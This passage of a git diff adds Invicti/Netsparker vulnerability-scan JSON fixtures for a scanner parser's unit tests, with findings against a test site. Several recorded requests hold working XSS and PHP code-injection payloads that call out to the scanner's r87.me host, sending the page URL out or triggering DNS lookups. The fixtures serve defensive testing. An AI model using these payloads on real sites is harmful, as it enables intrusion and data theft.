    ", + "RemedyReferences": "", + "Severity": "High", + "State": "Revived", + "Type": "BlindXss", + "Url": "http://php.testsparker.com/artist.php?id=%3CiMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d%27%27%3bthis.src%3d%27%2f%2fpbgjnvv2k8sv_nfk8lpxyks_jxy7mrsm1rv6ic0g%27%2b%275ou.r87.me%2fr%2f%3f%27%2blocation.href%22%3E" + }, + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "23", + "Cvss": { + "BaseScore": { + "Severity": 4, + "Type": "Base", + "Value": "10.0" + }, + "EnvironmentalScore": { + "Severity": 4, + "Type": "Environmental", + "Value": "10.0" + }, + "TemporalScore": { + "Severity": 4, + "Type": "Temporal", + "Value": "10.0" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + }, + "Cvss31": { + "BaseScore": { + "Severity": 4, + "Type": "Base", + "Value": "10.0" + }, + "EnvironmentalScore": { + "Severity": 4, + "Type": "Environmental", + "Value": "10.0" + }, + "TemporalScore": { + "Severity": 4, + "Type": "Temporal", + "Value": "10.0" + }, + "Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + }, + "Cwe": "94", + "Hipaa": "164.306(a), 164.308(a)", + "Owasp": "A1", + "OwaspProactiveControls": "", + "Pci32": "6.5.1", + "Wasc": "" + }, + "Confirmed": true, + "Description": "

    Netsparker Enterprise identified a Remote Code Evaluation (PHP) by capturing a DNS A request, which occurs when input data is run as code.

    \n

    This is a highly critical issue and should be addressed as soon as possible.

    ", + "ExploitationSkills": "
    This vulnerability is not difficult to leverage. PHP is a high level language for which there are vast resources available. Successful exploitation requires knowledge of the programming language, access to the source code or the ability to produce source code for use in such attacks, and minimal attack skills.
    ", + "ExternalReferences": "", + "ExtraInformation": [], + "FirstSeenDate": "16/06/2021 12:38 PM", + "HttpRequest": { + "Content": "GET /hello.php?name=%2bgethostbyname(trim(%27pbgjnvv2k8amvntlvrb4nfp0wti6jxm92k1h8ehc%27.%276ii.r87.me%27))%3b%2f%2f HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nCookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d\r\nReferer: http://php.testsparker.com/process.php\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [ + { + "Name": "name", + "Type": "Querystring", + "Value": "+gethostbyname(trim('pbgjnvv2k8amvntlvrb4nfp0wti6jxm92k1h8ehc'.'6ii.r87.me'));//", + "Vulnerable": true + } + ] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 2770\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:50:36 GMT\r\n\r\n", + "Duration": 0.0, + "StatusCode": 0 + }, + "LookupId": "c7139765-b9c1-494c-7b46-ad490211f1ab", + "Impact": "
    An attacker can execute arbitrary PHP code on the system. The attacker may also be able to execute arbitrary system commands.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 02:01 AM", + "Name": "Out of Band Code Evaluation (PHP)", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    Do not accept input from end users that will be directly interpreted as source code. If this is a business requirement, validate all the input on the application and remove all the data that could be directly interpreted as PHP source code.
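    A minimal sketch of such validation, assuming plain Python and the "name" parameter from the request above (the allow-list pattern is an assumption, not part of the scanner output):

        import re

        SAFE_NAME = re.compile(r"[A-Za-z][A-Za-z0-9 _-]{0,63}")

        def greet(name: str) -> str:
            # Reject anything that is not a plain name; never pass input to eval()/exec().
            if not SAFE_NAME.fullmatch(name):
                msg = "invalid 'name' parameter"
                raise ValueError(msg)
            return f"Hello {name}"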
    ", + "RemedyReferences": "", + "Severity": "Critical", + "State": "Revived", + "Type": "OutOfBandRcePhp", + "Url": "http://php.testsparker.com/hello.php?name=%2bgethostbyname(trim(%27pbgjnvv2k8amvntlvrb4nfp0wti6jxm92k1h8ehc%27.%276ii.r87.me%27))%3b%2f%2f" + }, + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "4.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "4.8" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "4.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N/E:H/RL:O/RC:C/CR:H/IR:H/AR:H" + }, + "Cvss31": null, + "Cwe": "16", + "Hipaa": "", + "Owasp": "", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "15" + }, + "Confirmed": false, + "Description": "

    CSP is an added layer of security that helps to mitigate mainly Cross-site Scripting attacks.

    \n

    CSP can be enabled by instructing the browser with a Content-Security-Policy directive in a response header:

    Content-Security-Policy: script-src 'self';

    or in a meta tag:

    <meta http-equiv=\"Content-Security-Policy\" content=\"script-src 'self';\">

    In the above example, you can restrict script loading only to the same domain. It will also restrict inline script executions both in the element attributes and the event handlers. There are various directives which you can use by declaring CSP:

    • script-src: Restricts the script loading resources to the ones you declared. By default, it disables inline script executions unless you permit the evaluation functions and inline scripts by the unsafe-eval and unsafe-inline keywords.
    • base-uri: The base element is used to resolve a relative URL to an absolute one. By using this CSP directive, you can define all possible URLs which could be assigned to the base-href attribute of the document.
    • frame-ancestors: It is very similar to the X-Frame-Options HTTP header. It defines the URLs by which the page can be loaded in an iframe.
    • frame-src / child-src: frame-src is the deprecated version of child-src. Both define the sources that can be loaded by iframe in the page. (Please note that frame-src was brought back in CSP 3.)
    • object-src: Defines the resources that can be loaded by embedding, such as Flash files and Java applets.
    • img-src: As its name implies, it defines the resources where the images can be loaded from.
    • connect-src: Defines the whitelisted targets for XMLHttpRequest and WebSocket objects.
    • default-src: It is a fallback for the directives that mostly end with the -src suffix. When the directives below are not defined, the value set to default-src will be used instead:
      • child-src
      • connect-src
      • font-src
      • img-src
      • manifest-src
      • media-src
      • object-src
      • script-src
      • style-src

    When setting the CSP directives, you can also use some CSP keywords:

    • none: Denies loading resources from anywhere.
    • self: Points to the document's URL (domain + port).
    • unsafe-inline: Permits running inline scripts.
    • unsafe-eval: Permits execution of evaluation functions such as eval().

    In addition to CSP keywords, you can also use a wildcard or only a scheme when defining whitelist URLs for these directives. Wildcards can be used for the subdomain and port portions of the URLs:

    Content-Security-Policy: script-src https://*.example.com;
    Content-Security-Policy: script-src https://example.com:*;
    Content-Security-Policy: script-src https:;

    It is also possible to set a CSP in Report-Only mode instead of enforcing it immediately during the migration period. This way you can see the violations of the CSP policy in the current state of your web site while migrating to CSP:

    Content-Security-Policy-Report-Only: script-src 'self'; report-uri: https://example.com;
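    A minimal sketch of emitting such a header, assuming a Django application (the whitelisted CDN host is a placeholder):

        class ContentSecurityPolicyMiddleware:
            def __init__(self, get_response):
                self.get_response = get_response

            def __call__(self, request):
                response = self.get_response(request)
                # Start strict and whitelist only what the site actually needs.
                response["Content-Security-Policy"] = (
                    "default-src 'self'; "
                    "script-src 'self' https://cdn.example.com; "
                    "object-src 'none'; "
                    "frame-ancestors 'none'"
                )
                return response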
    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Page Type", + "Value": "Other" + } + ], + "FirstSeenDate": "16/06/2021 12:30 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "e172ace9-3b52-43f6-3fca-ad490209f280", + "Impact": "

    There is no direct impact of not implementing CSP on your website. However, if your website is vulnerable to a Cross-site Scripting attack, CSP can prevent successful exploitation of that vulnerability. By not implementing CSP you’ll be missing out on this extra layer of security.

    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Content Security Policy (CSP) Not Implemented", + "ProofOfConcept": "", + "RemedialActions": "
    • Enable CSP on your website by sending the Content-Security-Policy in HTTP response headers that instruct the browser to apply the policies you specified.
    • Apply the whitelist and policies as strict as possible.
    • Rescan your application to see if Netsparker Enterprise identifies any weaknesses in your policies.
    ", + "RemedialProcedure": "

    Enable CSP on your website by sending the Content-Security-Policy in HTTP response headers that instruct the browser to apply the policies you specified.

    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "CspNotImplemented", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 70, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "19", + "Cvss": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "8.6" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "8.6" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "8.6" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + }, + "Cvss31": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "8.6" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "8.6" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "8.6" + }, + "Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + }, + "Cwe": "79", + "Hipaa": "164.308(a)", + "Owasp": "A3", + "OwaspProactiveControls": "", + "Pci32": "6.5.7", + "Wasc": "8" + }, + "Confirmed": false, + "Description": "

    Netsparker Enterprise detected Possible Blind Cross-site Scripting via capturing a triggered DNS A request, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application, but was unable to confirm the vulnerability.

    \n

    This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [], + "FirstSeenDate": "16/06/2021 12:38 PM", + "HttpRequest": { + "Content": "GET /products.php?pro=%27%22--%3e%3c%2fstyle%3e%3c%2fscRipt%3e%3cscRipt%20src%3d%22%2f%2fpbgjnvv2k89fhedxarfdk4pywx6zqjmszpdlk5ftvlu%26%2346%3br87%26%2346%3bme%22%3e%3c%2fscRipt%3e HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nCookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d\r\nReferer: http://php.testsparker.com/process.php\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [ + { + "Name": "pro", + "Type": "Querystring", + "Value": "'\"-->", + "Vulnerable": true + } + ] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 2824\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:51:00 GMT\r\n\r\n", + "Duration": 0.0, + "StatusCode": 0 + }, + "LookupId": "d442332c-e250-4c70-7b3c-ad490211f13b", + "Impact": "
    There are many different attacks that can be leveraged through the use of cross-site scripting, including:
    • Hijacking user's active session.
    • Mounting phishing attacks.
    • Intercepting data and performing man-in-the-middle attacks.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 02:01 AM", + "Name": "[Possible] Blind Cross-site Scripting", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes into a JavaScript block within the HTML document, then it needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.

    Additionally, you should implement a strong Content Security Policy (CSP) as a defense-in-depth measure if an XSS vulnerability is mistakenly introduced. Due to the complexity of XSS prevention and the lack of secure standard behavior in programming languages and frameworks, XSS vulnerabilities are still common in web applications.

    CSP will act as a safeguard that can prevent an attacker from successfully exploiting Cross-site Scripting vulnerabilities in your website and is advised for any kind of application. Please make sure to scan your application again with Content Security Policy checks enabled after implementing CSP, in order to avoid common mistakes that can impact the effectiveness of your policy. There are a few pitfalls that can render your CSP policy useless and we highly recommend reading the resources linked in the reference section before you start to implement one.
    ", + "RemedyReferences": "", + "Severity": "High", + "State": "Revived", + "Type": "PossibleBlindXss", + "Url": "http://php.testsparker.com/products.php?pro=%27%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%20src%3d%22%2f%2fpbgjnvv2k89fhedxarfdk4pywx6zqjmszpdlk5ftvlu%26%2346%3br87%26%2346%3bme%22%3E%3C%2fscRipt%3E" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "6.5" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "5.7" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "5.7" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N/E:U/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "200", + "Hipaa": "", + "Owasp": "A6", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "" + }, + "Confirmed": false, + "Description": "

    Netsparker Enterprise detected that the Referrer-Policy header is not implemented.

    \n

    Referrer-Policy is a security header designed to prevent cross-domain Referer leakage. 

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Page Type", + "Value": "Other" + } + ], + "FirstSeenDate": "16/06/2021 12:30 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "4576a39d-e4a5-481f-3fcf-ad490209f34b", + "Impact": "

    The Referer header is a request header that indicates the site from which the traffic originated. If there is no adequate prevention in place, the URL itself, and even sensitive information contained in the URL, will be leaked to the cross-site destination.

    \n

    The lack of a Referrer-Policy header might affect the privacy of the users and the site itself.

    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Referrer-Policy Not Implemented", + "ProofOfConcept": "", + "RemedialActions": "

    In a response header:

    Referrer-Policy: no-referrer | same-origin | origin | strict-origin | no-origin-when-downgrading

    In a META tag:

    <meta name=\"Referrer-Policy\" value=\"no-referrer | same-origin\"/>

    In an element attribute:

    <a href=\"http://crosssite.example.com\" rel=\"noreferrer\"></a>

    or

    <a href=\"http://crosssite.example.com\" referrerpolicy=\"no-referrer | same-origin | origin | strict-origin | no-origin-when-downgrading\"></a>
    ", + "RemedialProcedure": "

    Please implement a Referrer-Policy by using the Referrer-Policy response header or by declaring it in the meta tags. It’s also possible to control referrer information for an individual HTML element by using the rel attribute.

    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "ReferrerPolicyNotImplemented", + "Url": "http://php.testsparker.com/" + } + ] +} \ No newline at end of file diff --git a/unittests/scans/invicti/invicti_one_finding.json b/unittests/scans/invicti/invicti_one_finding.json new file mode 100644 index 00000000000..9b717a0f5e6 --- /dev/null +++ b/unittests/scans/invicti/invicti_one_finding.json @@ -0,0 +1,85 @@ +{ + "Generated": "25/06/2021 09:59 AM", + "Target": { + "Duration": "00:00:41.3968969", + "Initiated": "25/06/2021 09:53 AM", + "ScanId": "663eb6e88d9e4f4d9e00ad52017aa66d", + "Url": "http://php.testsparker.com/" + }, + "Vulnerabilities": [ + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "107", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "5.7" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "5.5" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "5.5" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "16", + "Hipaa": "", + "Owasp": "A5", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "15" + }, + "Confirmed": true, + "Description": "

    Netsparker Enterprise identified a cookie not marked as HTTPOnly.

    \n

    HTTPOnly cookies cannot be read by client-side scripts, therefore marking a cookie as HTTPOnly can provide an additional layer of protection against cross-site scripting attacks.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Identified Cookie(s)", + "Value": "PHPSESSID" + }, + { + "Name": "Cookie Source", + "Value": "HTTP Header" + }, + { + "Name": "Page Type", + "Value": "Login" + } + ], + "FirstSeenDate": "16/06/2021 12:30 PM", + "HttpRequest": { + "Content": "GET /auth/login.php HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nReferer: http://php.testsparker.com/auth/\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nSet-Cookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d; path=/\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nContent-Length: 3061\r\nX-Powered-By: PHP/5.2.6\r\nPragma: no-cache\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\n\n\n", + "Duration": 41.4849, + "StatusCode": 200 + }, + "LookupId": "735f4503-e9eb-4b4c-4306-ad49020a4c4b", + "Impact": "
    During a cross-site scripting attack, an attacker might easily access cookies and hijack the victim's session.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Cookie Not Marked as HttpOnly", + "ProofOfConcept": "", + "RemedialActions": "
    1. See the remedy for solution.
    2. Consider marking all of the cookies used by the application as HTTPOnly. (After these changes, JavaScript code will not be able to read cookies.)
    ", + "RemedialProcedure": "
    Mark the cookie as HTTPOnly. This will be an extra layer of defense against XSS. However this is not a silver bullet and will not protect the system against cross-site scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.
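    A minimal sketch of the remedy, assuming a Django application (cookie names and values are illustrative):

        # settings.py: session and CSRF cookies become HttpOnly/Secure.
        SESSION_COOKIE_HTTPONLY = True
        SESSION_COOKIE_SECURE = True
        CSRF_COOKIE_SECURE = True

        # For cookies set manually on a response:
        # response.set_cookie("key", "value", httponly=True, secure=True, samesite="Lax")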
    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "CookieNotMarkedAsHttpOnly", + "Url": "http://php.testsparker.com/auth/login.php" + } + ] +} \ No newline at end of file diff --git a/unittests/scans/invicti/invicti_zero_finding.json b/unittests/scans/invicti/invicti_zero_finding.json new file mode 100644 index 00000000000..b33009971e5 --- /dev/null +++ b/unittests/scans/invicti/invicti_zero_finding.json @@ -0,0 +1,10 @@ +{ + "Generated": "25/06/2021 09:57 AM", + "Target": { + "Duration": "00:01:16.6130466", + "Initiated": "25/06/2021 01:42 AM", + "ScanId": "0a110f61b1f949ff30c8ad5104dfd9f5", + "Url": "http://php.testsparker.com/" + }, + "Vulnerabilities": [] +} \ No newline at end of file diff --git a/unittests/scans/invicti/issue_10311.json b/unittests/scans/invicti/issue_10311.json new file mode 100644 index 00000000000..3157fafb142 --- /dev/null +++ b/unittests/scans/invicti/issue_10311.json @@ -0,0 +1,173 @@ +{ + "Generated": "03/02/2019 15:50:29 (UTC-06:00)", + "Target": { + "ScanId": "fg49hk5", + "Url": "https://www.sampleweb.org/", + "Initiated": "03/02/2019 15:48:23 (UTC-06:00)", + "Duration": "00:01:20.4322725" + }, + "Vulnerabilities": [ + { + "Url": "https://www.sampleweb.org/", + "Type": "CookieNotMarkedAsSecure", + "Name": "Cookie Not Marked as Secure", + "Severity": "High", + "Certainty": 100, + "Confirmed": true, + "Classification": { + "Owasp": "A6", + "Owasp2017": "A3", + "Wasc": "15", + "Cwe": "614", + "Capec": "102", + "Pci31": "6.5.10", + "Pci32": "6.5.10", + "Hipaa": null + }, + "HttpRequest": { + "Method": "GET", + "Content": "GET / HTTP/1.1\r\nHost: www.sampleweb.org\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\r\nX-Scanner: Netsparker\r\n\r\n", + "Parameters": [ ] + }, + "HttpResponse": { + "StatusCode": 200, + "Duration": 644.6389, + "Content": "HTTP/1.1 200 OK\r\nX-Cache: MISS\r\nX-Timer: S1551563304.277046,VS0,VE20\r\nAge: 0\r\nCache-Control: max-age=600\r\nETag: W/\"5b8fd2e9-6807\"\r\nAccess-Control-Allow-Origin: *\r\nX-Fastly-Request-ID: 0345654a04250c6d1c420d386643c1f6dc7c3c24\r\nX-Served-By: cache-chi21166-CHI\r\nConnection: keep-alive\r\nExpires: Sat, 02 Mar 2019 21:58:24 GMT\r\nAccept-Ranges: bytes\r\nX-Cache-Hits: 0\r\nContent-Length: 5954\r\nX-GitHub-Request-Id: 0820:594C:6A9400:84F805:5C7AFA26\r\nVary: Accept-Encoding\r\nVia: 1.1 varnish\r\nLast-Modified: Wed, 05 Sep 2018 12:58:17 GMT\r\nContent-Type: text/html; charset=utf-8\r\nServer: GitHub.com\r\nDate: Sat, 02 Mar 2019 21:48:24 GMT\r\nContent-Encoding: \r\n\r\n" + }, + "ExtraInformation": [ + { + "Name": "Identified Cookie(s)", + "Value": "cookieconsent_status" + }, + { + "Name": "Cookie Source", + "Value": "JavaScript" + } + ], + "KnownVulnerabilities": [ ], + "Description": "

    Netsparker identified a cookie not marked as secure, and transmitted over HTTPS.

    This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic, or following a successful man-in-the-middle attack.

    ", + "Impact": "
    This cookie will be transmitted over an HTTP connection; therefore, if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a man-in-the-middle attack, he/she can force the victim to make an HTTP request to steal the cookie.
    ", + "RemedialActions": "
    1. See the remedy for solution.
    2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)
    ", + "ExploitationSkills": "
    To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to understand layer 2, have physical access to systems either as waypoints for the traffic, or have locally gained access to a system between the victim and the web server.
    ", + "RemedialProcedure": "
    Mark all cookies used within the application as secure.
    ", + "RemedyReferences": "", + "ExternalReferences": "", + "ProofOfConcept": "" + }, + { + "Url": "https://www.sampleweb.org/", + "Type": "BootstrapjsOutOfDate", + "Name": "Out-of-date Version (Bootstrap)", + "Severity": "Medium", + "Certainty": 90, + "Confirmed": false, + "Classification": { + "Owasp": "A9", + "Owasp2017": "A9", + "Wasc": null, + "Cwe": null, + "Capec": "310", + "Pci31": "6.2", + "Pci32": "6.2", + "Hipaa": null + }, + "HttpRequest": { + "Method": "GET", + "Content": "GET / HTTP/1.1\r\nHost: www.sampleweb.org\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\r\nX-Scanner: Netsparker\r\n\r\n", + "Parameters": [ ] + }, + "HttpResponse": { + "StatusCode": 200, + "Duration": 644.6389, + "Content": "HTTP/1.1 200 OK\r\nX-Cache: MISS\r\nX-Timer: S1551563304.277046,VS0,VE20\r\nAge: 0\r\nCache-Control: max-age=600\r\nETag: W/\"5b8fd2e9-6807\"\r\nAccess-Control-Allow-Origin: *\r\nX-Fastly-Request-ID: 0345654a04250c6d1c420d386643c1f6dc7c3c24\r\nX-Served-By: cache-chi21166-CHI\r\nConnection: keep-alive\r\nExpires: Sat, 02 Mar 2019 21:58:24 GMT\r\nAccept-Ranges: bytes\r\nX-Cache-Hits: 0\r\nContent-Length: 5954\r\nX-GitHub-Request-Id: 0820:594C:6A9400:84F805:5C7AFA26\r\nVary: Accept-Encoding\r\nVia: 1.1 varnish\r\nLast-Modified: Wed, 05 Sep 2018 12:58:17 GMT\r\nContent-Type: text/html; charset=utf-8\r\nServer: GitHub.com\r\nDate: Sat, 02 Mar 2019 21:48:24 GMT\r\nContent-Encoding: \r\n\r\n" + }, + "ExtraInformation": [ + { + "Name": "Identified Version", + "Value": "4.0.0" + }, + { + "Name": "Latest Version", + "Value": "4.3.1" + }, + { + "Name": "Vulnerability Database", + "Value": "Result is based on 3/1/2019 vulnerability database content." + } + ], + "KnownVulnerabilities": [ + { + "Title": "bootstrap.js Cross-Site Scripting (XSS) Vulnerability", + "Severity": "Medium" + }, + { + "Title": "bootstrap.js Cross-Site Scripting (XSS) Vulnerability", + "Severity": "Medium" + }, + { + "Title": "bootstrap.js Cross-Site Scripting (XSS) Vulnerability", + "Severity": "Medium" + }, + { + "Title": "bootstrap.js Cross-Site Scripting (XSS) Vulnerability", + "Severity": "Medium" + } + ], + "Description": "

    Netsparker identified that the target web site is using Bootstrap and detected that it is out of date.

    ", + "Impact": "
    Since this is an old version of the software, it may be vulnerable to attacks.
    ", + "RemedialActions": "", + "ExploitationSkills": "", + "RemedialProcedure": "
    Please upgrade your installation of Bootstrap to the latest stable version.
    ", + "RemedyReferences": "", + "ExternalReferences": "", + "ProofOfConcept": "" + }, + { + "Url": "https://www.sampleweb.org/", + "Type": "CookieNotMarkedAsHttpOnly", + "Name": "Cookie Not Marked as HttpOnly", + "Severity": "Low", + "Certainty": 100, + "Confirmed": true, + "Classification": { + "Owasp": "A5", + "Owasp2017": "A6", + "Wasc": "15", + "Cwe": "16", + "Capec": "107", + "Pci31": null, + "Pci32": null, + "Hipaa": null + }, + "HttpRequest": { + "Method": "GET", + "Content": "GET / HTTP/1.1\r\nHost: www.sampleweb.org\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\r\nX-Scanner: Netsparker\r\n\r\n", + "Parameters": [ ] + }, + "HttpResponse": { + "StatusCode": 200, + "Duration": 644.6389, + "Content": null + }, + "ExtraInformation": [ + { + "Name": "Identified 